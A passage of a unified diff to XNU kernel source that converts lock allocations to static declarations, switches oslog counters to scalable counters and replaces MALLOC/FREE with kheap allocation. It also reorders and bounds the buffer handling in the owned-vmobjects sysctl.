+static LCK_GRP_DECLARE(sysctl_debug_test_stackshot_owner_grp, "test-stackshot-owner-grp");
+static LCK_MTX_DECLARE(sysctl_debug_test_stackshot_owner_init_mtx,
+    &sysctl_debug_test_stackshot_owner_grp);
 
 /* This is a sysctl for testing collection of owner info on a lock in kernel space. A multi-threaded
  * test from userland sets this sysctl in such a way that a thread blocks in kernel mode, and a
@@ -3462,17 +3401,17 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus
        long long mtx_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_lck);
        int error = sysctl_io_number(req, mtx_unslid_addr, sizeof(long long), (void*)&option, NULL);
 
-       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
        if (!sysctl_debug_test_stackshot_mtx_inited) {
                lck_mtx_init(&sysctl_debug_test_stackshot_owner_lck,
-                   sysctl_debug_test_stackshot_owner_grp,
+                   &sysctl_debug_test_stackshot_owner_grp,
                    LCK_ATTR_NULL);
                semaphore_create(kernel_task,
                    &sysctl_debug_test_stackshot_mutex_sem,
                    SYNC_POLICY_FIFO, 0);
                sysctl_debug_test_stackshot_mtx_inited = 1;
        }
-       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
        if (!error) {
                switch (option) {
@@ -3489,15 +3428,15 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus
                        semaphore_signal(sysctl_debug_test_stackshot_mutex_sem);
                        break;
                case SYSCTL_DEBUG_MTX_TEARDOWN:
-                       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
                        lck_mtx_destroy(&sysctl_debug_test_stackshot_owner_lck,
-                           sysctl_debug_test_stackshot_owner_grp);
+                           &sysctl_debug_test_stackshot_owner_grp);
                        semaphore_destroy(kernel_task,
                            sysctl_debug_test_stackshot_mutex_sem);
                        sysctl_debug_test_stackshot_mtx_inited = 0;
 
-                       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
                        break;
                case -1:         /* user just wanted to read the value, so do nothing */
                        break;
@@ -3543,10 +3482,10 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus
        long long rwlck_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_rwlck);
        int error = sysctl_io_number(req, rwlck_unslid_addr, sizeof(long long), (void*)&option, NULL);
 
-       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
        if (!sysctl_debug_test_stackshot_rwlck_inited) {
                lck_rw_init(&sysctl_debug_test_stackshot_owner_rwlck,
-                   sysctl_debug_test_stackshot_owner_grp,
+                   &sysctl_debug_test_stackshot_owner_grp,
                    LCK_ATTR_NULL);
                semaphore_create(kernel_task,
                    &sysctl_debug_test_stackshot_rwlck_sem,
@@ -3554,7 +3493,7 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus
                    0);
                sysctl_debug_test_stackshot_rwlck_inited = 1;
        }
-       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
        if (!error) {
                switch (option) {
@@ -3580,15 +3519,15 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus
                        semaphore_signal(sysctl_debug_test_stackshot_rwlck_sem);
                        break;
                case SYSCTL_DEBUG_KRWLCK_TEARDOWN:
-                       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
                        lck_rw_destroy(&sysctl_debug_test_stackshot_owner_rwlck,
-                           sysctl_debug_test_stackshot_owner_grp);
+                           &sysctl_debug_test_stackshot_owner_grp);
                        semaphore_destroy(kernel_task,
                            sysctl_debug_test_stackshot_rwlck_sem);
                        sysctl_debug_test_stackshot_rwlck_inited = 0;
 
-                       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
                        break;
                case -1:         /* user just wanted to read the value, so do nothing */
                        break;
@@ -4343,20 +4282,24 @@ extern int vm_page_delayed_work_ctx_needed;
 SYSCTL_INT(_vm, OID_AUTO, vm_page_needed_delayed_work_ctx, CTLFLAG_RD | CTLFLAG_LOCKED, &vm_page_delayed_work_ctx_needed, 0, "");
 
 /* log message counters for persistence mode */
-extern uint32_t oslog_p_total_msgcount;
-extern uint32_t oslog_p_metadata_saved_msgcount;
-extern uint32_t oslog_p_metadata_dropped_msgcount;
-extern uint32_t oslog_p_error_count;
-extern uint32_t oslog_p_saved_msgcount;
-extern uint32_t oslog_p_dropped_msgcount;
-extern uint32_t oslog_p_boot_dropped_msgcount;
-extern uint32_t oslog_p_coprocessor_total_msgcount;
-extern uint32_t oslog_p_coprocessor_dropped_msgcount;
+SCALABLE_COUNTER_DECLARE(oslog_p_total_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_metadata_saved_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_metadata_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_error_count);
+SCALABLE_COUNTER_DECLARE(oslog_p_saved_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_boot_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_total_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_unresolved_kc_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_fmt_invalid_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_fmt_max_args_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_truncated_msgcount);
 
 /* log message counters for streaming mode */
 extern uint32_t oslog_s_total_msgcount;
 extern uint32_t oslog_s_metadata_msgcount;
-extern uint32_t oslog_s_error_count;
+SCALABLE_COUNTER_DECLARE(oslog_s_error_count);
 extern uint32_t oslog_s_streamed_msgcount;
 extern uint32_t oslog_s_dropped_msgcount;
 
@@ -4369,19 +4312,24 @@ extern uint32_t oslog_msgbuf_dropped_charcount;
 extern uint32_t vaddlog_msgcount;
 extern uint32_t vaddlog_msgcount_dropped;
 
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_total_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_metadata_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_saved_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_metadata_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_dropped_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_error_count, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_saved_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_dropped_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_boot_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_boot_dropped_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_total_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_dropped_msgcount, 0, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_total_msgcount, oslog_p_total_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_saved_msgcount, oslog_p_metadata_saved_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_dropped_msgcount, oslog_p_metadata_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_error_count, oslog_p_error_count, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_saved_msgcount, oslog_p_saved_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_dropped_msgcount, oslog_p_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_boot_dropped_msgcount, oslog_p_boot_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_total_msgcount, oslog_p_coprocessor_total_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_dropped_msgcount, oslog_p_coprocessor_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_unresolved_kc_msgcount, oslog_p_unresolved_kc_msgcount, "");
+
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_invalid_msgcount, oslog_p_fmt_invalid_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_max_args_msgcount, oslog_p_fmt_max_args_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_truncated_msgcount, oslog_p_truncated_msgcount, "");
 
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_total_msgcount, 0, "");
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_metadata_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_metadata_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_s_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_error_count, 0, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_s_error_count, oslog_s_error_count, "");
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_streamed_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_streamed_msgcount, 0, "");
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_dropped_msgcount, 0, "");
 
@@ -4687,6 +4635,8 @@ SYSCTL_QUAD(_kern, OID_AUTO, driverkit_checkin_timed_out,
     &driverkit_checkin_timed_out, "timestamp of dext checkin timeout");
 #endif
 
+extern int IOGetVMMPresent(void);
+
 static int
 hv_vmm_present SYSCTL_HANDLER_ARGS
 {
@@ -4696,11 +4646,7 @@ hv_vmm_present SYSCTL_HANDLER_ARGS
 
        int hv_vmm_present = 0;
 
-#if defined (__arm64__)
-       /* <rdar://problem/59966231> Need a way to determine if ARM xnu is running as a guest */
-#elif defined (__x86_64__)
-       hv_vmm_present = cpuid_vmm_present();
-#endif
+       hv_vmm_present = IOGetVMMPresent();
 
        return SYSCTL_OUT(req, &hv_vmm_present, sizeof(hv_vmm_present));
 }
@@ -4810,7 +4756,7 @@ SYSCTL_PROC(_kern, OID_AUTO, sysent_const_check,
 #endif
 
 #if DEVELOPMENT || DEBUG
-SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 1, "");
+SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_KERN, NULL, 1, "");
 #else
 SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 0, "");
 #endif
@@ -5569,52 +5515,59 @@ sysctl_get_owned_vmobjects SYSCTL_HANDLER_ARGS
        mach_port_name_t task_port_name;
        task_t task;
        size_t buffer_size = (req->oldptr != USER_ADDR_NULL) ? req->oldlen : 0;
-       vmobject_list_output_t buffer;
+       vmobject_list_output_t buffer = NULL;
        size_t output_size;
        size_t entries;
 
+       /* we have a "newptr" (for write) we get a task port name from the caller. */
+       error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t));
+
+       if (error != 0) {
+               goto sysctl_get_vmobject_list_exit;
+       }
+
+       task = port_name_to_task_read(task_port_name);
+       if (task == TASK_NULL) {
+               error = ESRCH;
+               goto sysctl_get_vmobject_list_exit;
+       }
+
+       /* get the current size */
+       task_copy_vmobjects(task, NULL, 0, &entries);
+       size_t max_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0;
+
+       /* if buffer_size is specified clamp to the current size then allcoate the kernel buffer */
        if (buffer_size) {
                if (buffer_size < sizeof(*buffer) + sizeof(vm_object_query_data_t)) {
-                       return ENOMEM;
+                       error = ENOMEM;
+                       goto sysctl_get_vmobject_list_deallocate_and_exit;
                }
 
+               buffer_size = (buffer_size > max_size) ? max_size : buffer_size;
                buffer = kheap_alloc(KHEAP_TEMP, buffer_size, Z_WAITOK);
 
                if (!buffer) {
                        error = ENOMEM;
-                       goto sysctl_get_vmobject_list_exit;
+                       goto sysctl_get_vmobject_list_deallocate_and_exit;
                }
        } else {
                buffer = NULL;
        }
 
-       /* we have a "newptr" (for write) we get a task port name from the caller. */
-       error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t));
-
-       if (error != 0) {
-               goto sysctl_get_vmobject_list_exit;
-       }
-
-       task = port_name_to_task(task_port_name);
-       if (task == TASK_NULL) {
-               error = ESRCH;
-               goto sysctl_get_vmobject_list_exit;
-       }
-
        /* copy the vmobjects and vmobject data out of the task */
        if (buffer_size == 0) {
-               task_copy_vmobjects(task, NULL, 0, &entries);
-               output_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0;
+               output_size = max_size;
        } else {
                task_copy_vmobjects(task, &buffer->data[0], buffer_size - sizeof(*buffer), &entries);
                buffer->entries = (uint64_t)entries;
                output_size = entries * sizeof(vm_object_query_data_t) + sizeof(*buffer);
        }
 
-       task_deallocate(task);
-
        error = SYSCTL_OUT(req, (char*) buffer, output_size);
 
+sysctl_get_vmobject_list_deallocate_and_exit:
+       task_deallocate(task);
+
 sysctl_get_vmobject_list_exit:
        if (buffer) {
                kheap_free(KHEAP_TEMP, buffer, buffer_size);
@@ -5626,3 +5579,20 @@ sysctl_get_vmobject_list_exit:
 SYSCTL_PROC(_vm, OID_AUTO, get_owned_vmobjects,
     CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_WR | CTLFLAG_MASKED | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     0, 0, sysctl_get_owned_vmobjects, "A", "get owned vmobjects in task");
+
+extern uint64_t num_static_scalable_counters;
+SYSCTL_QUAD(_kern, OID_AUTO, num_static_scalable_counters, CTLFLAG_RD | CTLFLAG_LOCKED, &num_static_scalable_counters, "");
+
+uuid_string_t trial_treatment_id;
+uuid_string_t trial_experiment_id;
+int trial_deployment_id = -1;
+
+SYSCTL_STRING(_kern, OID_AUTO, trial_treatment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_treatment_id, sizeof(trial_treatment_id), "");
+SYSCTL_STRING(_kern, OID_AUTO, trial_experiment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_experiment_id, sizeof(trial_experiment_id), "");
+SYSCTL_INT(_kern, OID_AUTO, trial_deployment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &trial_deployment_id, 0, "");
+
+#if DEVELOPMENT || DEBUG
+/* For unit testing setting factors & limits. */
+unsigned int testing_experiment_factor;
+EXPERIMENT_FACTOR_UINT(_kern, testing_experiment_factor, &testing_experiment_factor, 5, 10, "");
+#endif /* DEVELOPMENT || DEBUG */
index eac338d176f3aebfc0e500d5fb5d6f818f65c756..f678647974b60a62f20fb192d80740f25cc31de4 100644 (file)
 #define HZ      100     /* XXX */
 
 /* simple lock used to access timezone, tz structure */
-lck_spin_t * tz_slock;
-lck_grp_t * tz_slock_grp;
-lck_attr_t * tz_slock_attr;
-lck_grp_attr_t  *tz_slock_grp_attr;
+static LCK_GRP_DECLARE(tz_slock_grp, "tzlock");
+static LCK_SPIN_DECLARE(tz_slock, &tz_slock_grp);
 
 static void             setthetime(
        struct timeval  *tv);
 
-void time_zone_slock_init(void);
 static boolean_t timeval_fixusec(struct timeval *t1);
 
 /*
@@ -151,9 +148,9 @@ gettimeofday(
        }
 
        if (uap->tzp) {
-               lck_spin_lock(tz_slock);
+               lck_spin_lock(&tz_slock);
                ltz = tz;
-               lck_spin_unlock(tz_slock);
+               lck_spin_unlock(&tz_slock);
 
                error = copyout((caddr_t)&ltz, CAST_USER_ADDR_T(uap->tzp), sizeof(tz));
        }
@@ -224,9 +221,9 @@ settimeofday(__unused struct proc *p, struct settimeofday_args  *uap, __unused i
                setthetime(&atv);
        }
        if (uap->tzp) {
-               lck_spin_lock(tz_slock);
+               lck_spin_lock(&tz_slock);
                tz = atz;
-               lck_spin_unlock(tz_slock);
+               lck_spin_unlock(&tz_slock);
        }
        return 0;
 }
@@ -921,21 +918,6 @@ ppsratecheck(struct timeval *lasttime, int *curpps, int maxpps)
 }
 #endif /* NETWORKING */
 
-void
-time_zone_slock_init(void)
-{
-       /* allocate lock group attribute and group */
-       tz_slock_grp_attr = lck_grp_attr_alloc_init();
-
-       tz_slock_grp =  lck_grp_alloc_init("tzlock", tz_slock_grp_attr);
-
-       /* Allocate lock attribute */
-       tz_slock_attr = lck_attr_alloc_init();
-
-       /* Allocate the spin lock */
-       tz_slock = lck_spin_alloc_init(tz_slock_grp, tz_slock_attr);
-}
-
 int
 __mach_bridge_remote_time(__unused struct proc *p, struct __mach_bridge_remote_time_args *mbrt_args, uint64_t *retval)
 {
index 2e111de759bd15b14310453dbfa7fe584efe61be..2a7942ce936ea4d6988786ff8db069b84a1938fa 100644 (file)
@@ -154,7 +154,7 @@ skip_cred_check:
 }
 
 extern void OSKextResetAfterUserspaceReboot(void);
-extern void zone_gc(boolean_t);
+extern void zone_gc_drain(void);
 
 int
 usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retval)
@@ -184,7 +184,7 @@ usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retva
        int shm_error = pshm_cache_purge_all(p);
        int sem_error = psem_cache_purge_all(p);
 
-       zone_gc(FALSE);
+       zone_gc_drain();
 
        return shm_error != 0 ? shm_error : sem_error;
 }
index 8cd16e22061498630bc1b0d737a3bbfde629534e..8e1d821ce3564e9fa5d0ec5a6e057412e1c0f732 100644 (file)
@@ -52,7 +52,7 @@ static const mbuf_flags_t mbuf_cflags_mask = (MBUF_EXT);
 #define MAX_MBUF_TX_COMPL_FUNC 32
 mbuf_tx_compl_func
     mbuf_tx_compl_table[MAX_MBUF_TX_COMPL_FUNC];
-extern lck_rw_t *mbuf_tx_compl_tbl_lock;
+extern lck_rw_t mbuf_tx_compl_tbl_lock;
 u_int32_t mbuf_tx_compl_index = 0;
 
 #if (DEVELOPMENT || DEBUG)
@@ -1782,11 +1782,11 @@ get_tx_compl_callback_index(mbuf_tx_compl_func callback)
 {
        u_int32_t i;
 
-       lck_rw_lock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock);
 
        i = get_tx_compl_callback_index_locked(callback);
 
-       lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock);
 
        return i;
 }
@@ -1800,9 +1800,9 @@ m_get_tx_compl_callback(u_int32_t idx)
                ASSERT(0);
                return NULL;
        }
-       lck_rw_lock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock);
        cb = mbuf_tx_compl_table[idx];
-       lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock);
        return cb;
 }
 
@@ -1816,7 +1816,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback)
                return EINVAL;
        }
 
-       lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        i = get_tx_compl_callback_index_locked(callback);
        if (i != -1) {
@@ -1834,7 +1834,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback)
                }
        }
 unlock:
-       lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        return error;
 }
@@ -1849,7 +1849,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback)
                return EINVAL;
        }
 
-       lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        /* assume the worst */
        error = ENOENT;
@@ -1861,7 +1861,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback)
                }
        }
 unlock:
-       lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        return error;
 }
@@ -1950,9 +1950,9 @@ m_do_tx_compl_callback(struct mbuf *m, struct ifnet *ifp)
                        continue;
                }
 
-               lck_rw_lock_shared(mbuf_tx_compl_tbl_lock);
+               lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock);
                callback = mbuf_tx_compl_table[i];
-               lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock);
+               lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock);
 
                if (callback != NULL) {
                        callback(m->m_pkthdr.pkt_compl_context,
index 30d0b513ac000daf835d186c45966d5c06220f41..53f886c28c8558f959dcc19d590a7dfc032b1d8c 100644 (file)
@@ -237,7 +237,7 @@ sock_bind(socket_t sock, const struct sockaddr *to)
        }
 
        if (to->sa_len > sizeof(ss)) {
-               MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME, M_WAITOK);
+               sa = kheap_alloc(KHEAP_TEMP, to->sa_len, Z_WAITOK);
                if (sa == NULL) {
                        return ENOBUFS;
                }
@@ -250,7 +250,7 @@ sock_bind(socket_t sock, const struct sockaddr *to)
        error = sobindlock(sock, sa, 1);        /* will lock socket */
 
        if (sa != NULL && want_free == TRUE) {
-               FREE(sa, M_SONAME);
+               kheap_free(KHEAP_TEMP, sa, sa->sa_len);
        }
 
        return error;
@@ -270,8 +270,8 @@ sock_connect(socket_t sock, const struct sockaddr *to, int flags)
        }
 
        if (to->sa_len > sizeof(ss)) {
-               MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME,
-                   (flags & MSG_DONTWAIT) ? M_NOWAIT : M_WAITOK);
+               sa = kheap_alloc(KHEAP_TEMP, to->sa_len,
+                   (flags & MSG_DONTWAIT) ? Z_NOWAIT : Z_WAITOK);
                if (sa == NULL) {
                        return ENOBUFS;
                }
@@ -323,7 +323,7 @@ out:
        socket_unlock(sock, 1);
 
        if (sa != NULL && want_free == TRUE) {
-               FREE(sa, M_SONAME);
+               kheap_free(KHEAP_TEMP, sa, sa->sa_len);
        }
 
        return error;
@@ -475,9 +475,8 @@ sogetaddr_locked(struct socket *so, struct sockaddr **psa, int peer)
 
        if (error == 0 && *psa == NULL) {
                error = ENOMEM;
-       } else if (error != 0 && *psa != NULL) {
+       } else if (error != 0) {
                FREE(*psa, M_SONAME);
-               *psa = NULL;
        }
        return error;
 }
@@ -501,9 +500,7 @@ sock_getaddr(socket_t sock, struct sockaddr **psa, int peer)
 void
 sock_freeaddr(struct sockaddr *sa)
 {
-       if (sa != NULL) {
-               FREE(sa, M_SONAME);
-       }
+       FREE(sa, M_SONAME);
 }
 
 errno_t
@@ -806,9 +803,7 @@ cleanup:
        if (control != NULL) {
                m_freem(control);
        }
-       if (fromsa != NULL) {
-               FREE(fromsa, M_SONAME);
-       }
+       FREE(fromsa, M_SONAME);
        return error;
 }
 
index 4492cf15faf5024d8a7003af557b1a3ef0fe3d86..8c3976246fd36a3ca8d17865c5495a8fbb58c273 100644 (file)
 #define SFEF_NODETACH           0x2     /* Detach should not be called */
 #define SFEF_NOSOCKET           0x4     /* Socket is gone */
 
+/*
+ * If you need accounting for KM_IFADDR consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_IFADDR       KHEAP_DEFAULT
+
 struct socket_filter_entry {
        struct socket_filter_entry      *sfe_next_onsocket;
        struct socket_filter_entry      *sfe_next_onfilter;
@@ -85,9 +91,12 @@ struct socket_filter {
 
 TAILQ_HEAD(socket_filter_list, socket_filter);
 
-static struct socket_filter_list        sock_filter_head;
-static lck_rw_t                         *sock_filter_lock = NULL;
-static lck_mtx_t                        *sock_filter_cleanup_lock = NULL;
+static LCK_GRP_DECLARE(sock_filter_lock_grp, "socket filter lock");
+static LCK_RW_DECLARE(sock_filter_lock, &sock_filter_lock_grp);
+static LCK_MTX_DECLARE(sock_filter_cleanup_lock, &sock_filter_lock_grp);
+
+static struct socket_filter_list        sock_filter_head =
+    TAILQ_HEAD_INITIALIZER(sock_filter_head);
 static struct socket_filter_entry       *sock_filter_cleanup_entries = NULL;
 static thread_t                         sock_filter_cleanup_thread = NULL;
 
@@ -143,26 +152,6 @@ sflt_permission_check(struct inpcb *inp)
        return 0;
 }
 
-__private_extern__ void
-sflt_init(void)
-{
-       lck_grp_attr_t  *grp_attrib = NULL;
-       lck_attr_t      *lck_attrib = NULL;
-       lck_grp_t       *lck_group = NULL;
-
-       TAILQ_INIT(&sock_filter_head);
-
-       /* Allocate a rw lock */
-       grp_attrib = lck_grp_attr_alloc_init();
-       lck_group = lck_grp_alloc_init("socket filter lock", grp_attrib);
-       lck_grp_attr_free(grp_attrib);
-       lck_attrib = lck_attr_alloc_init();
-       sock_filter_lock = lck_rw_alloc_init(lck_group, lck_attrib);
-       sock_filter_cleanup_lock = lck_mtx_alloc_init(lck_group, lck_attrib);
-       lck_grp_free(lck_group);
-       lck_attr_free(lck_attrib);
-}
-
 static void
 sflt_retain_locked(struct socket_filter *filter)
 {
@@ -175,14 +164,14 @@ sflt_release_locked(struct socket_filter *filter)
        if (os_ref_release_locked(&filter->sf_refcount) == 0) {
                /* Call the unregistered function */
                if (filter->sf_filter.sf_unregistered) {
-                       lck_rw_unlock_exclusive(sock_filter_lock);
+                       lck_rw_unlock_exclusive(&sock_filter_lock);
                        filter->sf_filter.sf_unregistered(
                                filter->sf_filter.sf_handle);
-                       lck_rw_lock_exclusive(sock_filter_lock);
+                       lck_rw_lock_exclusive(&sock_filter_lock);
                }
 
                /* Free the entry */
-               FREE(filter, M_IFADDR);
+               kheap_free(KM_IFADDR, filter, sizeof(struct socket_filter));
        }
 }
 
@@ -203,7 +192,7 @@ sflt_entry_release(struct socket_filter_entry *entry)
                /* That was the last reference */
 
                /* Take the cleanup lock */
-               lck_mtx_lock(sock_filter_cleanup_lock);
+               lck_mtx_lock(&sock_filter_cleanup_lock);
 
                /* Put this item on the cleanup list */
                entry->sfe_next_oncleanup = sock_filter_cleanup_entries;
@@ -222,7 +211,7 @@ sflt_entry_release(struct socket_filter_entry *entry)
                }
 
                /* Drop the cleanup lock */
-               lck_mtx_unlock(sock_filter_cleanup_lock);
+               lck_mtx_unlock(&sock_filter_cleanup_lock);
        } else if (old <= 0) {
                panic("sflt_entry_release - sfe_refcount (%d) <= 0\n",
                    (int)old);
@@ -236,11 +225,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
 {
 #pragma unused(blah, blah2)
        while (1) {
-               lck_mtx_lock(sock_filter_cleanup_lock);
+               lck_mtx_lock(&sock_filter_cleanup_lock);
                while (sock_filter_cleanup_entries == NULL) {
                        /* Sleep until we've got something better to do */
                        msleep(&sock_filter_cleanup_entries,
-                           sock_filter_cleanup_lock, PWAIT,
+                           &sock_filter_cleanup_lock, PWAIT,
                            "sflt_cleanup", NULL);
                }
 
@@ -249,10 +238,10 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
                sock_filter_cleanup_entries = NULL;
 
                /* Drop the lock */
-               lck_mtx_unlock(sock_filter_cleanup_lock);
+               lck_mtx_unlock(&sock_filter_cleanup_lock);
 
                /* Take the socket filter lock */
-               lck_rw_lock_exclusive(sock_filter_lock);
+               lck_rw_lock_exclusive(&sock_filter_lock);
 
                /* Cleanup every dead item */
                struct socket_filter_entry      *entry;
@@ -265,7 +254,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
